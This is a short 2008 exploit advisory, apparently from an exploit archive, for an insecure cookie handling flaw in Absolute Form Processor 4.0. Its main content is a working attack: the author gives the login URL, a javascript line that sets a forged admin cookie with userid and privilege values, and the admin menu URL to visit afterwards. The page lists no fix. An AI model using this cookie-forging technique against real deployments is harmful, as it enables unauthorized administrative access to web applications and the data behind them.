Absolute Form Processor 4.0 Insecure Cookie Handling Vulnerability

2008-10-31 16:01:05

###############################################################################################
_____ ____ __ ___ ______ ______ | ____ _____ _____
| / ___| \ \ / / / ____| / | | | | _ \ |
|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____
| | |_ || | | | |____ | | | | | | _ | |
|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______|

[~] Author : Hakxer
[~] Home : Www.educ-up.com
[~] Type Gap : Insecure Cookie Handling
[~] script : Absolute Form Processor [see script] http://www.xigla.com/absolutefpnet/demo.htm
[~] Team : EgY Coders
#################################################################################################

Exploit : First go to http://www.xigla.com/absolutefpnet/demo/login.aspx
Second Execute JS Code
[~] javascript:document.cookie="xlaAFPDEMOadmin=userid=1&lvl=1&createforms=checked";
Now Go to http://www.xigla.com/absolutefpnet/demo/menu.aspx

--- Proud To Be A Muslim ---

# _=END=_ #

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.